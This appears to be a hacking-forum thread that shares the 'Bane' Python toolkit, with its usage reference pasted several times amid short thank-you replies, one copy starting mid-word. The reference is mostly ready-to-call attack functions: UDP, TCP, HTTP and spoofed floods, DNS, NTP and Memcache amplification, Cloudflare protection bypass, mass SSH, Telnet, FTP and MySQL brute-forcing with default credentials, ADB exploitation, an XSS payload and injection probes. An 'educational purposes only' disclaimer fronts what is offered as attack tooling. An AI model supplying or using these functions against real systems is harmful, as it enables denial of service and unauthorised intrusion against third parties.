Bane - Hackers Toolkit

[94]

hope this works

[20]

lol rlly good bro

[17]

This python library is made for educationnal purposes only. Me, as the creator and developper, not responsible for any misuse for this module in any malicious activity. it is made as a tool to understand how hackers can create their tools and performe their attacks. it contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing) and even more ;)

Show ContentSpoiler:

II-Usage (General usage):
DDoS:
UDP FLOOD:

bane.udp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001)
TCP FLOOD:

bane.tcp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500, timeout=5)
HTTP FLOOD:

bane.http_flood(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
HTTP FLOOD using proxies (HTTP/SOCKS4/SOCKS5):

bane.prox_http_flood(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
Torshammer attack:

bane.torshammer(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5)
Torshammer attack but through proxies instead of Tor:

bane.prox_hammer(IP, p= port , duration= 300 , threads=500 , timeout=5)
R.U.D.Y attack:

bane.rudy(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 , form="q" , page="/search.php")
Xerxes attack:

bane.xerxes(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 )
Xerxes attack through proxies:

bane.prox_xerxes(IP, p= port , duration= 300 , threads=500 , timeout=5 )
Slow read attack:

bane.slow_read(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Slow proxies flood:

bane.prox_slow(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Apache killer attack:

bane.apache_killer(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Slowloris attack:

bane.slowloris(IP, p= port , duration= 300 , set_tor=False , threads=50 , timeout=5 )
Slowloris attack through proxies:

bane.prox_slowloris(IP, p= port , duration= 300 , threads=500 , timeout=5 )
Hulk attack:

bane.hulk(IP , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Hulk attack through proxies:

bane.prox_hulk(IP , duration= 300 , set_tor=False , threads=500 , timeout=5 )
TCP flags attack:

bane.synflood(IP , p=port , duration= 300 , syn=1 , rst=0 , psh=0 , ack=0 , urg=0 , fin=0 , interval=0.1 , threads=50 )
Spoofed source UDP flood:

bane.spoofed_udp_flood(IP , p=port , duration= 300 , min_size=10 , max_size=20 , interval=0.1 , threads=50 )
LAND attack:

bane.land(IP , p=port , duration= 300 , min_size=10 , max_size=20 , interval=0.1 , threads=50 )
DNS amplification attack:

bane.dns_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
NTP amplification attack:

bane.ntp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
Memcache amplification attack:

bane.memcache_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
Chargen amplification attack:

bane.chargen_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
SSDP amplification attack:

bane.ssdp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
SNMP amplification attack:

bane.snmp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
ECHO reflection attack:

bane.echo_reflection(IP , p=port , min_size=10 , max_size=20 , duration= 300 , servers=[] , interval=0.1 , threads=50 )
ICMP FLOOD:

bane.icmp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500 )
ICMP FLOOD with spoofed sources:

bane.spoofed_icmp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500 )
BlackNurse attack:

bane.blacknurse(IP, p= port , duration= 300 , interval=0.001 , threads=500 )
Goldeneye attack:

bane.goldeneye(IP, p= port , duration= 300 , threads=500 , timeout=5 )
Doser attack:

bane.doser(link , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Doser attack through proxies:

bane.doser(link , duration= 300 , threads=500 , timeout=5 )
Bypass "Under attack mode" provided by CloudFlare:

bane.cf_kill_ua(link , duration= 300 , threads=500 , timeout=5 )
Bypass "Under attack mode" provided by CloudFlare and Rate-Limiting:

bane.cf_kill_ua_rate_limiting(link , duration= 300 , set_tor=False , threads=500 , timeout=5 )
WordPress testing:
Users list:

bane.wp_users_list(link , timeout=15 )
User information:

bane.wp_user(link , user=user_id , timeout=15 )
Posts list:

bane.wp_posts_list(link , timeout=15 )
Post information:

bane.wp_post(link , post=post_id , timeout=15 )
Users Enumeration:

bane.wp_users_enumeration(link , timeout=15 )
WordPress version:

bane.wp_version(link , timeout=15 )
Vulnerable plugins and themes:

bane.wp_scan(link , timeout=15 )
Vulnerabilities TESTING:
SQL Injection error based:

bane.sqli_error_based(link , timeout=15 )
SQL Injection boolean based:

bane.sqli_boolean_based(link , timeout=15 )
SQL Injection time based:

bane.sqli_time_based(link , timeout=15 )
XSS GET method:

bane.xss_get(link , {"q" : "<script>alert(123)</script>"}, extra={"Submit" : "Submit"} , timeout=15 )
XSS POST method:

bane.xss_post(link , {"q" : "<script>alert(123)</script>"}, extra={"Submit" : "Submit"} , timeout=15 )
Automatic XSS scan for page:

bane.xss(link , payload="<script>alert(123)</script>" , timeout=15 )
Command execution with a link:

bane.command_exec_link(link , timeout=15 )
Command execution GET method:

bane.command_exec_get(link,param="q" , timeout=15 )
Command execution POST method:

bane.command_exec_post(link,param="q" , timeout=15 )
PHP code injection with a link:

bane.php_code_inject_link(link , timeout=15 )
PHP code injection GET method:

bane.php_code_inject_get(link,param="q" , timeout=15 )
PHP code injection POST method:

bane.php_code_injectc_post(link,param="q" , timeout=15 )
File inclusion:

bane.file_inclusion(link, timeout=15 )
Headers timeout:

bane.headers_timeout_test(IP , port=80, max_timeout=30 )
Slow GET test:

bane.slow_get_test(IP , port=80, duration=180 )
Maximum number of allowed connections from a single host:

bane.max_connections_limit(IP , port=80, connections=150 , duration=180 )
Slow POST test:

bane.slow_post_test(IP , port=80, duration=180 )
Slow Read test:

bane.slow_read_test(IP , port=80, duration=180 )
Android Debug Bridge (ADB) exploit:

bane.adb_exploit(IP , timeout=5 )
Exposed unauthenticated Telnet server:

bane.exposed_telnet(IP , timeout=5 )
Proxies collecting:
Mass HTTP proxies gathering:

bane.masshttp()
Mass SOCKS4 proxies gathering:

bane.massocks4()
Mass SOCKS5 proxies gathering:

bane.massocks5()
Some HTTP proxies gathering:

bane.http()
Some HTTPS proxies gathering:

bane.https()
Some SOCKS4 proxies gathering:

bane.socks4()
Some SOCKS5 proxies gathering:

bane.socks5()
Checking proxy:

bane.proxy_check(IP , port , proto="http" , timeout=5)
IoTs mass scanning:
Mass ssh scanning: (if you are on Windows OS, please install Putty)

bane.mass_ssh(threads=100 , word_list= ["root:root","admin:admin"] )
Mass telnet scanning:

bane.mass_telnet(threads=100 , word_list= ["root:root","admin:admin"] )
Mass telnet scanning:

bane.mass_telnet(threads=100 , word_list= ["root:root","admin:admin"] )
Mass unauthenticated telnet scanning:

bane.mass_exposed_telnet(threads=100 )
Mass FTP scanning:

bane.mass_ftp(threads=100 , word_list= ["root:root","admin:admin"] )
Mass Anonymous FTP scanning:

bane.mass_ftp_anon(threads=100 )
Mass SMTP scanning:

bane.mass_smtp(threads=100 , word_list= ["root:root","admin:admin"] )
Mass MySQL scanning:

bane.mass_mysql(threads=100 , word_list= ["root:root","admin:admin"] )
Mass MySQL scanning for servers with username "root" and empty password:

bane.mass_mysql_default(threads=100 )
Mass Android Debug Bridge (ADB) exploit:

bane.mass_adb(threads=100 )
Extract information from page:
Get all page inputs and their values:

bane.inputs(link , value=True , timeout=10 )
Get all page forms and their values:

bane.forms(link , value=True , timeout=10 )
Get login form:

bane.loginform(link , value=True , timeout=10 )
Get all links on the page:

bane.crawl(link , timeout=10 )
Get all paths on the page:

bane.pather(link , timeout=10 )
Get all social media and external links on the page:

bane.media(link , timeout=10 )
Get all subdomains links on the page:

bane.subdomains_extract(link , timeout=10 )
Information gathering:
Get banner:

bane.get_banner(IP , p=port , payload=None , timeout=5 )
Get infomation about Domain or IP:

bane.info(IP , timeout=15 )
safeweb.norton.com report for a link:

bane.norton_rate(link , timeout=15 )
Your IP address:

bane.myip()
WHOIS:

bane.who_is( domain )
GEO-Information for any IP:

bane.geoip( IP )
HTTP headers:

bane.headers( link )
Reverse IP Lookup:

bane.reverse_ip_lookup( IP )
Resolve any domain using a specific DNS server:

bane.resolve( domain , server="8.8.8.8" )
Very Fast port scan:

bane.port_scan( IP , ports=[21,22,23,25,43,53,80,443,2082,3306] , timeout=5 )
Subdomains finder:

bane.subdomains_finder( domain )
Encryption:
XOR:

bane.xor( data, key )
Caesar:

bane.caesar( data, key )
MD5:

bane.md_5( data )
SHA1:

bane.sha1( data )
SHA224:

bane.sha224( data )
SHA256:

bane.sha256( data )
SHA384:

bane.sha384( data )
SHA512:

bane.sha512( data )
Base64 encoding:

bane.base64encode( data )
Base64 decoding:

bane.base64decode( data )
File content encryption with MD5:

bane.md5fl( file )
File content encryption with SHA1:

bane.sha1fl( file )
File content encryption with SHA224:

bane.sha224fl( file )
File content encryption with SHA256:

bane.sha256fl( file )
File content encryption with SHA384:

bane.sha384fl( file )
File content encryption with SHA512:

bane.sha512fl( file )
File content encoding with base64:

bane.base64encodefl( file )
File content decoding with base64:

bane.base64decodefl( file )
Decryption:
MD5:

bane.decrypt(hash , word_list=["admin","admin123","love"] , md5_hash=True )
SHA1:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha1_hash=True )
SHA224:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha224_hash=True )
SHA256:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha256_hash=True )
SHA384:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha384_hash=True )
SHA512:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha512_hash=True )
Base64:

bane.decrypt(hash , word_list=["admin","admin123","love"] , base64_hash=True )
Caesar:

bane.decrypt(hash , word_list=["admin","admin123","love"] , caesar_hash=True )
Bruteforcing:
Admin panel on web page:

bane.admin_brute_force(link , word_list=["admin:admin","admin:1234"] , timeout=15 )
FTP server:

bane.hydra(IP , protocol="ftp" , word_list=["admin:admin","admin:1234"] , timeout=5 )
SSH server: (if you are on windows, please install Putty)

bane.hydra(IP , p=22 , protocol="ssh" , word_list=["admin:admin","admin:1234"] , timeout=5 )
TELNET server:

bane.hydra(IP , p=23 , protocol="telnet" , word_list=["admin:admin","admin:1234"] , timeout=5 )
SMTP server:

bane.hydra(IP , p=25 , protocol="smtp" , ehlo=False , helo=True , ttls=False , word_list=["admin:admin","admin:1234"] , timeout=5)
MySQL server:

bane.hydra(IP , p=3306 , protocol="mysqlt" , word_list=["admin:admin","admin:1234"] , timeout=5 )
WordPress login page:

bane.hydra(link , protocol="wp" , word_list=["admin:admin","admin:1234"] , timeout=15 )
Admin panel finder:

bane.admin_panel_finder(link , ext="php" , timeout=15 )
Force browsing pages on admin panel:

bane.force_browsing(link , ext="php" , timeout=15 )
Filemanager finder:

bane.filemanager_finder(link , ext="php" , timeout=15 )
Amplification factors calculation for some protocols:
DNS:

bane.dns_factor( IP , timeout=3 )
NTP:

bane.ntp_factor( IP , timeout=3 )
Memcache:

bane.memcache_factor( IP , timeout=3 )
Chargen:

bane.chargen_factor( IP , timeout=3 )
SSDP:

bane.ssdp_factor( IP , timeout=3 )
SNMP:

bane.snmp_factor( IP , timeout=3 )
ECHO:

bane.echo_factor( IP , timeout=3 )
Tor IP switching:
Without password: (doesn't work with Windows OS)

bane.tor_switch_no_password( interval=30 , logs=True )
Without password: (doesn't work with Windows OS)

bane.tor_switch_with_password( interval=30 , password=password , p=9051 , logs=True)
Updating bane:
Updating for Python2:

bane.update_py2(version=None)
Updating for Python3:

bane.update_py3(version=None)
Some extra useful functions:
Clear a file:

bane.clear_file( file )
Create a file:

bane.create_file( file )
Delete a file:

bane.delete_file( file )
Get content of a file:

bane.read_file( file )
Get CloudFlare cookie: (you must install NodeJS first)

bane.get_cf_cookie( domain , user_agent )
Get HTB invitation:

bane.HTB_invitation()
Get Facebook account's ID:

bane.facebook_id( fb_link )
Google dorking:

bane.google_dorking( dork )
Webhint report's link:

bane.webhint_report( link )
Youtube search:

bane.youtube_search( query )
Write to a file:

bane.write_file( data , file )

 

INSTALLING THE LIBRARY AND IMPORTING:

thxxxxxxxxxxxxxxxxxxxxxxxx

[17]

thxxx

[63]

ne.wp_scan(link , timeout=15 )
Vulnerabilities TESTING:
SQL Injection error based:

bane.sqli_error_based(link , timeout=15 )
SQL Injection boolean based:

bane.sqli_boolean_based(link , timeout=15 )
SQL Injection time based:

bane.sqli_time_based(link , timeout=15 )
XSS GET method:

bane.xss_get(link , {"q" : "<script>alert(123)</script>"}, extra={"Submit" : "Submit"} , timeout=15 )
XSS POST method:

bane.xss_post(link , {"q" : "<script>alert(123)</script>"}, extra={"Submit" : "Submit"} , timeout=15 )
Automatic XSS scan for page:

bane.xss(link , payload="<script>alert(123)</script>" , timeout=15 )
Command execution with a link:

bane.command_exec_link(link , timeout=15 )
Command execution GET method:

bane.command_exec_get(link,param="q" , timeout=15 )
Command execution POST method:

bane.command_exec_post(link,param="q" , timeout=15 )
PHP code injection with a link:

bane.php_code_inject_link(link , timeout=15 )
PHP code injection GET method:

bane.php_code_inject_get(link,param="q" , timeout=15 )
PHP code injection POST method:

bane.php_code_injectc_post(link,param="q" , timeout=15 )
File inclusion:

bane.file_inclusion(link, timeout=15 )
Headers timeout:

bane.headers_timeout_test(IP , port=80, max_timeout=30 )
Slow GET test:

bane.slow_get_test(IP , port=80, duration=180 )
Maximum number of allowed connections from a single host:

bane.max_connections_limit(IP , port=80, connections=150 , duration=180 )
Slow POST test:

bane.slow_post_test(IP , port=80, duration=180 )
Slow Read test:

bane.slow_read_test(IP , port=80, duration=180 )
Android Debug Bridge (ADB) exploit:

bane.adb_exploit(IP , timeout=5 )
Exposed unauthenticated Telnet server:

bane.exposed_telnet(IP , timeout=5 )
Proxies collecting:
Mass HTTP proxies gathering:

bane.masshttp()
Mass SOCKS4 proxies gathering:

bane.massocks4()
Mass SOCKS5 proxies gathering:

bane.massocks5()
Some HTTP proxies gathering:

bane.http()
Some HTTPS proxies gathering:

bane.https()
Some SOCKS4 proxies gathering:

bane.socks4()
Some SOCKS5 proxies gathering:

bane.socks5()
Checking proxy:

bane.proxy_check(IP , port , proto="http" , timeout=5)
IoTs mass scanning:
Mass ssh scanning: (if you are on Windows OS, please install Putty)

bane.mass_ssh(threads=100 , word_list= ["root:root","admin:admin"] )
Mass telnet scanning:

bane.mass_telnet(threads=100 , word_list= ["root:root","admin:admin"] )
Mass telnet scanning:

bane.mass_telnet(threads=100 , word_list= ["root:root","admin:admin"] )
Mass unauthenticated telnet scanning:

bane.mass_exposed_telnet(threads=100 )
Mass FTP scanning:

bane.mass_ftp(threads=100 , word_list= ["root:root","admin:admin"] )
Mass Anonymous FTP scanning:

bane.mass_ftp_anon(threads=100 )
Mass SMTP scanning:

bane.mass_smtp(threads=100 , word_list= ["root:root","admin:admin"] )
Mass MySQL scanning:

bane.mass_mysql(threads=100 , word_list= ["root:root","admin:admin"] )
Mass MySQL scanning for servers with username "root" and empty password:

bane.mass_mysql_default(threads=100 )
Mass Android Debug Bridge (ADB) exploit:

bane.mass_adb(threads=100 )
Extract information from page:
Get all page inputs and their values:

bane.inputs(link , value=True , timeout=10 )
Get all page forms and their values:

bane.forms(link , value=True , timeout=10 )
Get login form:

bane.loginform(link , value=True , timeout=10 )
Get all links on the page:

bane.crawl(link , timeout=10 )
Get all paths on the page:

bane.pather(link , timeout=10 )
Get all social media and external links on the page:

bane.media(link , timeout=10 )
Get all subdomains links on the page:

bane.subdomains_extract(link , timeout=10 )
Information gathering:
Get banner:

bane.get_banner(IP , p=port , payload=None , timeout=5 )
Get infomation about Domain or IP:

bane.info(IP , timeout=15 )
safeweb.norton.com report for a link:

bane.norton_rate(link , timeout=15 )
Your IP address:

bane.myip()
WHOIS:

bane.who_is( domain )
GEO-Information for any IP:

bane.geoip( IP )
HTTP headers:

bane.headers( link )
Reverse IP Lookup:

bane.reverse_ip_lookup( IP )
Resolve any domain using a specific DNS server:

bane.resolve( domain , server="8.8.8.8" )
Very Fast port scan:

bane.port_scan( IP , ports=[21,22,23,25,43,53,80,443,2082,3306] , timeout=5 )
Subdomains finder:

bane.subdomains_finder( domain )
Encryption:
XOR:

bane.xor( data, key )
Caesar:

bane.caesar( data, key )
MD5:

bane.md_5( data )
SHA1:

bane.sha1( data )
SHA224:

bane.sha224( data )
SHA256:

bane.sha256( data )
SHA384:

bane.sha384( data )
SHA512:

bane.sha512( data )
Base64 encoding:

bane.base64encode( data )
Base64 decoding:

bane.base64decode( data )
File content encryption with MD5:

bane.md5fl( file )
File content encryption with SHA1:

bane.sha1fl( file )
File content encryption with SHA224:

bane.sha224fl( file )
File content encryption with SHA256:

bane.sha256fl( file )
File content encryption with SHA384:

bane.sha384fl( file )
File content encryption with SHA512:

bane.sha512fl( file )
File content encoding with base64:

bane.base64encodefl( file )
File content decoding with base64:

bane.base64decodefl( file )
Decryption:
MD5:

bane.decrypt(hash , word_list=["admin","admin123","love"] , md5_hash=True )
SHA1:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha1_hash=True )
SHA224:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha224_hash=True )
SHA256:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha256_hash=True )
SHA384:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha384_hash=True )
SHA512:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha512_hash=True )
Base64:

bane.decrypt(hash , word_list=["admin","admin123","love"] , base64_hash=True )
Caesar:

bane.decrypt(hash , word_list=["admin","admin123","love"] , caesar_hash=True )
Bruteforcing:
Admin panel on web page:

bane.admin_brute_force(link , word_list=["admin:admin","admin:1234"] , timeout=15 )
FTP server:

bane.hydra(IP , protocol="ftp" , word_list=["admin:admin","admin:1234"] , timeout=5 )
SSH server: (if you are on windows, please install Putty)

bane.hydra(IP , p=22 , protocol="ssh" , word_list=["admin:admin","admin:1234"] , timeout=5 )
TELNET server:

bane.hydra(IP , p=23 , protocol="telnet" , word_list=["admin:admin","admin:1234"] , timeout=5 )
SMTP server:

bane.hydra(IP , p=25 , protocol="smtp" , ehlo=False , helo=True , ttls=False , word_list=["admin:admin","admin:1234"] , timeout=5)
MySQL server:

bane.hydra(IP , p=3306 , protocol="mysqlt" , word_list=["admin:admin","admin:1234"] , timeout=5 )
WordPress login page:

bane.hydra(link , protocol="wp" , word_list=["admin:admin","admin:1234"] , timeout=15 )
Admin panel finder:

bane.admin_panel_finder(link , ext="php" , timeout=15 )
Force browsing pages on admin panel:

bane.force_browsing(link , ext="php" , timeout=15 )
Filemanager finder:

bane.filemanager_finder(link , ext="php" , timeout=15 )
Amplification factors calculation for some protocols:
DNS:

bane.dns_factor( IP , timeout=3 )
NTP:

bane.ntp_factor( IP , timeout=3 )
Memcache:

bane.memcache_factor( IP , timeout=3 )
Chargen:

bane.chargen_factor( IP , timeout=3 )
SSDP:

bane.ssdp_factor( IP , timeout=3 )
SNMP:

bane.snmp_factor( IP , timeout=3 )
ECHO:

bane.echo_factor( IP , timeout=3 )
Tor IP switching:
Without password: (doesn't work with Windows OS)

bane.tor_switch_no_password( interval=30 , logs=True )
Without password: (doesn't work with Windows OS)

bane.tor_switch_with_password( interval=30 , password=password , p=9051 , logs=True)
Updating bane:
Updating for Python2:

bane.update_py2(version=None)
Updating for Python3:

bane.update_py3(version=None)
Some extra useful functions:
Clear a file:

bane.clear_file( file )
Create a file:

bane.create_file( file )
Delete a file:

bane.delete_file( file )
Get content of a file:

bane.read_file( file )
Get CloudFlare cookie: (you must install NodeJS first)

bane.get_cf_cookie( domain , user_agent )
Get HTB invitation:

bane.HTB_invitation()
Get Facebook account's ID:

bane.facebook_id( fb_link )
Google dorking:

bane.google_dorking( dork )
Webhint report's link:

bane.webhint_report( link )
Youtube search:

bane.youtube_search( query )
Write to a file:

bane.write_file( data , file )[/spoiler]
 

INSTALLING THE LIBRARY AND IMPORTING:

tnx for this man appreciate it this

[29]

This python library is made for educationnal purposes only. Me, as the creator and developper, not responsible for any misuse for this module in any malicious activity. it is made as a tool to understand how hackers can create their tools and performe their attacks. it contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing) and even more ;)

Show ContentSpoiler:

II-Usage (General usage):
DDoS:
UDP FLOOD:

bane.udp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001)
TCP FLOOD:

bane.tcp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500, timeout=5)
HTTP FLOOD:

bane.http_flood(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
HTTP FLOOD using proxies (HTTP/SOCKS4/SOCKS5):

bane.prox_http_flood(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)
Torshammer attack:

bane.torshammer(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5)
Torshammer attack but through proxies instead of Tor:

bane.prox_hammer(IP, p= port , duration= 300 , threads=500 , timeout=5)
R.U.D.Y attack:

bane.rudy(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 , form="q" , page="/search.php")
Xerxes attack:

bane.xerxes(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 )
Xerxes attack through proxies:

bane.prox_xerxes(IP, p= port , duration= 300 , threads=500 , timeout=5 )
Slow read attack:

bane.slow_read(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Slow proxies flood:

bane.prox_slow(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Apache killer attack:

bane.apache_killer(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Slowloris attack:

bane.slowloris(IP, p= port , duration= 300 , set_tor=False , threads=50 , timeout=5 )
Slowloris attack through proxies:

bane.prox_slowloris(IP, p= port , duration= 300 , threads=500 , timeout=5 )
Hulk attack:

bane.hulk(IP , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Hulk attack through proxies:

bane.prox_hulk(IP , duration= 300 , set_tor=False , threads=500 , timeout=5 )
TCP flags attack:

bane.synflood(IP , p=port , duration= 300 , syn=1 , rst=0 , psh=0 , ack=0 , urg=0 , fin=0 , interval=0.1 , threads=50 )
Spoofed source UDP flood:

bane.spoofed_udp_flood(IP , p=port , duration= 300 , min_size=10 , max_size=20 , interval=0.1 , threads=50 )
LAND attack:

bane.land(IP , p=port , duration= 300 , min_size=10 , max_size=20 , interval=0.1 , threads=50 )
DNS amplification attack:

bane.dns_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
NTP amplification attack:

bane.ntp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
Memcache amplification attack:

bane.memcache_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
Chargen amplification attack:

bane.chargen_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
SSDP amplification attack:

bane.ssdp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
SNMP amplification attack:

bane.snmp_amplification(IP , p=port , duration= 300 , servers=[] , interval=0.1 , threads=50 )
ECHO reflection attack:

bane.echo_reflection(IP , p=port , min_size=10 , max_size=20 , duration= 300 , servers=[] , interval=0.1 , threads=50 )
ICMP FLOOD:

bane.icmp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500 )
ICMP FLOOD with spoofed sources:

bane.spoofed_icmp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500 )
BlackNurse attack:

bane.blacknurse(IP, p= port , duration= 300 , interval=0.001 , threads=500 )
Goldeneye attack:

bane.goldeneye(IP, p= port , duration= 300 , threads=500 , timeout=5 )
Doser attack:

bane.doser(link , duration= 300 , set_tor=False , threads=500 , timeout=5 )
Doser attack through proxies:

bane.doser(link , duration= 300 , threads=500 , timeout=5 )
Bypass "Under attack mode" provided by CloudFlare:

bane.cf_kill_ua(link , duration= 300 , threads=500 , timeout=5 )
Bypass "Under attack mode" provided by CloudFlare and Rate-Limiting:

bane.cf_kill_ua_rate_limiting(link , duration= 300 , set_tor=False , threads=500 , timeout=5 )
WordPress testing:
Users list:

bane.wp_users_list(link , timeout=15 )
User information:

bane.wp_user(link , user=user_id , timeout=15 )
Posts list:

bane.wp_posts_list(link , timeout=15 )
Post information:

bane.wp_post(link , post=post_id , timeout=15 )
Users Enumeration:

bane.wp_users_enumeration(link , timeout=15 )
WordPress version:

bane.wp_version(link , timeout=15 )
Vulnerable plugins and themes:

bane.wp_scan(link , timeout=15 )
Vulnerabilities TESTING:
SQL Injection error based:

bane.sqli_error_based(link , timeout=15 )
SQL Injection boolean based:

bane.sqli_boolean_based(link , timeout=15 )
SQL Injection time based:

bane.sqli_time_based(link , timeout=15 )
XSS GET method:

bane.xss_get(link , {"q" : "<script>alert(123)</script>"}, extra={"Submit" : "Submit"} , timeout=15 )
XSS POST method:

bane.xss_post(link , {"q" : "<script>alert(123)</script>"}, extra={"Submit" : "Submit"} , timeout=15 )
Automatic XSS scan for page:

bane.xss(link , payload="<script>alert(123)</script>" , timeout=15 )
Command execution with a link:

bane.command_exec_link(link , timeout=15 )
Command execution GET method:

bane.command_exec_get(link,param="q" , timeout=15 )
Command execution POST method:

bane.command_exec_post(link,param="q" , timeout=15 )
PHP code injection with a link:

bane.php_code_inject_link(link , timeout=15 )
PHP code injection GET method:

bane.php_code_inject_get(link,param="q" , timeout=15 )
PHP code injection POST method:

bane.php_code_injectc_post(link,param="q" , timeout=15 )
File inclusion:

bane.file_inclusion(link, timeout=15 )
Headers timeout:

bane.headers_timeout_test(IP , port=80, max_timeout=30 )
Slow GET test:

bane.slow_get_test(IP , port=80, duration=180 )
Maximum number of allowed connections from a single host:

bane.max_connections_limit(IP , port=80, connections=150 , duration=180 )
Slow POST test:

bane.slow_post_test(IP , port=80, duration=180 )
Slow Read test:

bane.slow_read_test(IP , port=80, duration=180 )
Android Debug Bridge (ADB) exploit:

bane.adb_exploit(IP , timeout=5 )
Exposed unauthenticated Telnet server:

bane.exposed_telnet(IP , timeout=5 )
Proxies collecting:
Mass HTTP proxies gathering:

bane.masshttp()
Mass SOCKS4 proxies gathering:

bane.massocks4()
Mass SOCKS5 proxies gathering:

bane.massocks5()
Some HTTP proxies gathering:

bane.http()
Some HTTPS proxies gathering:

bane.https()
Some SOCKS4 proxies gathering:

bane.socks4()
Some SOCKS5 proxies gathering:

bane.socks5()
Checking proxy:

bane.proxy_check(IP , port , proto="http" , timeout=5)
IoTs mass scanning:
Mass ssh scanning: (if you are on Windows OS, please install Putty)

bane.mass_ssh(threads=100 , word_list= ["root:root","admin:admin"] )
Mass telnet scanning:

bane.mass_telnet(threads=100 , word_list= ["root:root","admin:admin"] )
Mass telnet scanning:

bane.mass_telnet(threads=100 , word_list= ["root:root","admin:admin"] )
Mass unauthenticated telnet scanning:

bane.mass_exposed_telnet(threads=100 )
Mass FTP scanning:

bane.mass_ftp(threads=100 , word_list= ["root:root","admin:admin"] )
Mass Anonymous FTP scanning:

bane.mass_ftp_anon(threads=100 )
Mass SMTP scanning:

bane.mass_smtp(threads=100 , word_list= ["root:root","admin:admin"] )
Mass MySQL scanning:

bane.mass_mysql(threads=100 , word_list= ["root:root","admin:admin"] )
Mass MySQL scanning for servers with username "root" and empty password:

bane.mass_mysql_default(threads=100 )
Mass Android Debug Bridge (ADB) exploit:

bane.mass_adb(threads=100 )
Extract information from page:
Get all page inputs and their values:

bane.inputs(link , value=True , timeout=10 )
Get all page forms and their values:

bane.forms(link , value=True , timeout=10 )
Get login form:

bane.loginform(link , value=True , timeout=10 )
Get all links on the page:

bane.crawl(link , timeout=10 )
Get all paths on the page:

bane.pather(link , timeout=10 )
Get all social media and external links on the page:

bane.media(link , timeout=10 )
Get all subdomains links on the page:

bane.subdomains_extract(link , timeout=10 )
Information gathering:
Get banner:

bane.get_banner(IP , p=port , payload=None , timeout=5 )
Get infomation about Domain or IP:

bane.info(IP , timeout=15 )
safeweb.norton.com report for a link:

bane.norton_rate(link , timeout=15 )
Your IP address:

bane.myip()
WHOIS:

bane.who_is( domain )
GEO-Information for any IP:

bane.geoip( IP )
HTTP headers:

bane.headers( link )
Reverse IP Lookup:

bane.reverse_ip_lookup( IP )
Resolve any domain using a specific DNS server:

bane.resolve( domain , server="8.8.8.8" )
Very Fast port scan:

bane.port_scan( IP , ports=[21,22,23,25,43,53,80,443,2082,3306] , timeout=5 )
Subdomains finder:

bane.subdomains_finder( domain )
Encryption:
XOR:

bane.xor( data, key )
Caesar:

bane.caesar( data, key )
MD5:

bane.md_5( data )
SHA1:

bane.sha1( data )
SHA224:

bane.sha224( data )
SHA256:

bane.sha256( data )
SHA384:

bane.sha384( data )
SHA512:

bane.sha512( data )
Base64 encoding:

bane.base64encode( data )
Base64 decoding:

bane.base64decode( data )
File content encryption with MD5:

bane.md5fl( file )
File content encryption with SHA1:

bane.sha1fl( file )
File content encryption with SHA224:

bane.sha224fl( file )
File content encryption with SHA256:

bane.sha256fl( file )
File content encryption with SHA384:

bane.sha384fl( file )
File content encryption with SHA512:

bane.sha512fl( file )
File content encoding with base64:

bane.base64encodefl( file )
File content decoding with base64:

bane.base64decodefl( file )
